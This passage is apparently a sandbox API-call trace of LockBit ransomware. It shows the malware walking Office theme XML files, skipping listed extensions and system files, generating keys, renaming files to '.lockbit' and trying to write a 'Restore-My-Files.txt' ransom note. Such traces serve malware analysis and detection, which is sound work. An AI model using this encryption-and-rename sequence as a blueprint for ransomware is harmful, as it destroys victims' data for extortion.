0x753f1e2e [0193.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0193.818] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0193.825] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.825] malloc (_Size=0xc8) returned 0x1fa2ed8 [0193.825] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc8, FileInformationClass=0xa) returned 0x0 [0193.825] free (_Block=0x1fa2ed8) [0193.826] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.826] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.826] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.826] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaeab000, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x603f4990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfaeab000, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Solstice.xml", cAlternateFileName="")) returned 1 [0193.826] lstrcmpiW (lpString1=".", lpString2="Solstice.xml") returned -1 [0193.826] lstrcmpiW (lpString1="..", lpString2="Solstice.xml") returned -1 [0193.826] PathFindExtensionW (pszPath="Solstice.xml") returned=".xml" [0193.826] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.826] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.826] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.826] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.826] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.826] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.826] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.826] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.826] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.826] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.826] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.827] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Solstice.xml") returned -1 [0193.828] lstrcmpiW (lpString1="ntldr", lpString2="Solstice.xml") returned -1 [0193.828] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Solstice.xml") returned -1 [0193.828] lstrcmpiW (lpString1="bootsect.bak", lpString2="Solstice.xml") returned -1 [0193.828] lstrcmpiW (lpString1="autorun.inf", lpString2="Solstice.xml") returned -1 [0193.828] lstrcmpiW (lpString1="thumbs.db", lpString2="Solstice.xml") returned 1 [0193.828] lstrcmpiW (lpString1="iconcache.db", lpString2="Solstice.xml") returned -1 [0193.828] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.828] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml") returned=".xml" [0193.828] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.828] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.828] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.829] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.829] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml.lockbit") returned 87 [0193.829] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\solstice.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0193.830] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.830] malloc (_Size=0x40068) returned 0x1ff1e60 [0193.831] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=963) returned 1 [0193.831] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.831] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0193.831] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.832] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0193.832] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.839] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.839] malloc (_Size=0xc4) returned 0x1fa2ed8 [0193.839] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0193.840] free (_Block=0x1fa2ed8) [0193.840] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.840] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.840] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.840] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc1bdd00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x51cc30d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc1bdd00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Technic.xml", cAlternateFileName="")) returned 1 [0193.840] lstrcmpiW (lpString1=".", lpString2="Technic.xml") returned -1 [0193.840] lstrcmpiW (lpString1="..", lpString2="Technic.xml") returned -1 [0193.840] PathFindExtensionW (pszPath="Technic.xml") returned=".xml" [0193.840] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.840] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.840] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.841] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.842] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Technic.xml") returned -1 [0193.842] lstrcmpiW (lpString1="ntldr", lpString2="Technic.xml") returned -1 [0193.842] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Technic.xml") returned -1 [0193.842] lstrcmpiW (lpString1="bootsect.bak", lpString2="Technic.xml") returned -1 [0193.842] lstrcmpiW (lpString1="autorun.inf", lpString2="Technic.xml") returned -1 [0193.842] lstrcmpiW (lpString1="thumbs.db", lpString2="Technic.xml") returned 1 [0193.842] lstrcmpiW (lpString1="iconcache.db", lpString2="Technic.xml") returned -1 [0193.843] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.843] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml") returned=".xml" [0193.843] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.843] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.843] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.844] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.844] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.844] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.844] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.844] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.844] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.844] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.844] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml.lockbit") returned 86 [0193.844] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\technic.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0193.886] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.886] malloc (_Size=0x40068) returned 0x3df0008 [0193.886] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=962) returned 1 [0193.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.887] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0193.887] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.887] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0193.887] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0193.889] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.889] malloc (_Size=0xc2) returned 0x1fa2ed8 [0193.889] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0193.891] free (_Block=0x1fa2ed8) [0193.891] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.891] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.891] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.891] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa69f900, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x603f4990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa69f900, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Thatch.xml", cAlternateFileName="")) returned 1 [0193.891] lstrcmpiW (lpString1=".", lpString2="Thatch.xml") returned -1 [0193.891] lstrcmpiW (lpString1="..", lpString2="Thatch.xml") returned -1 [0193.891] PathFindExtensionW (pszPath="Thatch.xml") returned=".xml" [0193.892] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.892] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.893] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Thatch.xml") returned -1 [0193.893] lstrcmpiW (lpString1="ntldr", lpString2="Thatch.xml") returned -1 [0193.894] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Thatch.xml") returned -1 [0193.894] lstrcmpiW (lpString1="bootsect.bak", lpString2="Thatch.xml") returned -1 [0193.894] lstrcmpiW (lpString1="autorun.inf", lpString2="Thatch.xml") returned -1 [0193.894] lstrcmpiW (lpString1="thumbs.db", lpString2="Thatch.xml") returned 1 [0193.894] lstrcmpiW (lpString1="iconcache.db", lpString2="Thatch.xml") returned -1 [0193.894] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme 